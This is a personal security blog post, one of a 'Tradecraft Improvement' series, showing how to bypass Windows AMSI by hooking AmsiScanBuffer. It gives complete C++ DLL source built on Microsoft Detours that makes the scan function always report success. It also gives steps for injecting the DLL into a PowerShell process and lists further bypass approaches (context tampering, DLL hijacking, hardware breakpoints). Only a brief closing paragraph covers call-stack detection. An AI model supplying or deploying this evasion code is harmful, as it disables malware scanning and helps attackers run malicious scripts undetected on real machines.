Skip to main content

Blog by Dosxuz

Tradecraft Improvement 5 - AMSI Bypass 3 - Hooking AMSI Functions

In this blog we will take a look at some more AMSI Bypass techniques.

Hooking into AMSI

Another way of bypassing AMSI would be to hook an AMSI API and divert the execution to some other code. We can use detours library in C for the sake of simplicity to implement our hooks. Otherwise we can also use direct patching to implement our hooks

Hooking AmsiScanBuffer

In our example we will use AmsiScanBuffer to hook

  • We will compile the program as a DLL which we will then inject into the PowerShell session, in which we want to bypass AMSI

  • For injecting we will be using Process Hacker in this example, but you can also write a C/C++ code to inject the DLL into the target process

  • For the hooking portion we will be using the Detours package by Microsoft which can be integrated with Visual studio using vcpkg package manager.

  • For usage of vcpkg you can refer to this video

./vcpkg.exe integrate install

This will integrate vcpkg with your Visual Studio environment. Then

./vcpkg.exe install detours

This will install the detours package.

However, this is just to simplify our demonstration. Using direct patching will be much simpler.

The code for the DLL will look something as follows:

// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <Windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <detours/detours.h>
#include <amsi.h>

FARPROC amsiScanBufferAddress = NULL;
SIZE_T byteswritten = 0;
char amsiScanBufferOriginalBytes[14] = {};

typedef HRESULT(WINAPI* AmsiScanBuffer_t)(
    HAMSICONTEXT amsiContext,
    PVOID        buffer,
    ULONG        length,
    LPCWSTR      contentName,
    HAMSISESSION amsiSession,
    AMSI_RESULT* result
    );
AmsiScanBuffer_t AmsiScanBuffer_p = (AmsiScanBuffer_t)GetProcAddress(LoadLibraryA("amsi.dll"), "AmsiScanBuffer");

HRESULT HookedAmsiScanBuffer(HAMSICONTEXT amsiContext,
    PVOID        buffer,
    ULONG        length,
    LPCWSTR      contentName,
    HAMSISESSION amsiSession,
    AMSI_RESULT* result)
{
    printf("AmsiScanBuffer is hooked\n");

    return S_OK;
}

void Hook()
{
    DetourRestoreAfterWith();
    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    DetourAttach(&(PVOID&)AmsiScanBuffer_p, HookedAmsiScanBuffer);
    DetourTransactionCommit();
}

void Unhook()
{
    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    DetourDetach(&(PVOID&)AmsiScanBuffer_p, HookedAmsiScanBuffer);
    DetourTransactionCommit();
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        Hook();
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        Unhook();
        break;
    }
    return TRUE;
}

  • We will also need to include amsi.h to use the AMSI data structures and functions.

  • Before going into the main code we will use GetProcAddress and LoadLibrary to find the address of AmsiScanBuffer from amsi.dll and store it in a function pointer AmsiScanBuffer_p

  • Then we use the Detour functions to point to the address of this API

  • HookedAmsiScanBuffer is the function that will be executed when the actual AmsiScanBuffer is called.

    • It does nothing other than to print a string and return S_OK status
HRESULT HookedAmsiScanBuffer(HAMSICONTEXT amsiContext,
    PVOID        buffer,
    ULONG        length,
    LPCWSTR      contentName,
    HAMSISESSION amsiSession,
    AMSI_RESULT* result)
{
    printf("AmsiScanBuffer is hooked\n");

    return S_OK;
}
  • Next we create the Hook() function which will be under DLL_PROCESS_ATTACH section which means it will be called as soon as the DLL is loaded into that process.
  • The Hook() function uses Detours functions to patch the address of AmsiScanBuffer which is passed to DetoursAttach and replace it with HookedAmsiScanBuffer
void Hook()
{
    DetourRestoreAfterWith();
    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    DetourAttach(&(PVOID&)AmsiScanBuffer_p, HookedAmsiScanBuffer);
    DetourTransactionCommit();
}
  • Now whenever the AmsiScanBuffer function is called, the HookedAmsiScanBuffer will be called instead and there would be no scanning of our buffer by AMSI
  • When the DLL is unloaded from the process the Unhook() function is called which again uses Detours functions to remove the hook

Executing and analysing the program

  • Once we have compiled the program as a DLL in Visual Studio, we will start a PowerShell process
  • Then we will use Process Hacker to inject our DLL into the PowerShell process

"''

  • Select our DLL from Explorer

  • After then when we enter our malicious string in the PowerShell prompt we will see that the HookedAmsiScanBuffer is called instead of the actual AmsiScanBuffer

  • We can also confirm this by opening the PowerShell process in debugger and checking the address of AmsiScanBuffer

  • We see that there is a jmp instruction in place of the actual AmsiScanBuffer function opcodes.
  • The jump also shows that it goes to the HookedAmsiScanBuffer function

This technique can be applied to any of the AMSI API and their return values can be changed depending on the situation. We can also use Reflective DLL injection to inject a DLL of our choice without storing it in disk.

Some other methods of bypassing AMSI

There are still some methods remaining that I would love to discuss in the upcoming blogs about bypassing AMSI

  1. Attacking the amsiContext directly through .NET Framework -> In the previous blog we had learnt that some of the functions like AmsiOpenSession still checks if the value of amsiContext structure is 0 or not. We can use this to our advantage and change the value of amsiContext directly using our PowerShell code.
  2. Using DLL Hijacking -> One can hijack DLL search order for amsi.dll when a PowerShell session is launched. As a result a patched amsi.dll will be loaded which will either proxy the AMSI APIs or straight up return from a function and prevent scanning of buffer
  3. Using Hardware breakpoints -> Hardware Breakpoints can be used to insert a breakpoint in the program and prevent the scanning of string
  4. Attacking cld.dll -> When the CLR Runtime is loaded the clr.dll is also loaded. There are some imported functions in clr.dll that can be targeted to stop AMSI from scanning our payloads

These are some common AMSI bypass techniques that be used to detect AMSI bypasses and their detection logic will vary accordingly. So, we have to understand each of their internal workings before finding a detection.

For example, in the above bypass which uses hooking of AmsiScanBuffer, we can detect it by analysing the call stack, which will show us that right after each call to AmsiScanBuffer there is another function that is being called from another unknown DLL / memory region, which shouldn’t be the case in case of a normal AmsiScanBuffer call.

Therefore, detection for each bypass will vary accordingly.

2025-03-26
https://dosxuz.gitlab.io/post/tim_5/ Ritaban Das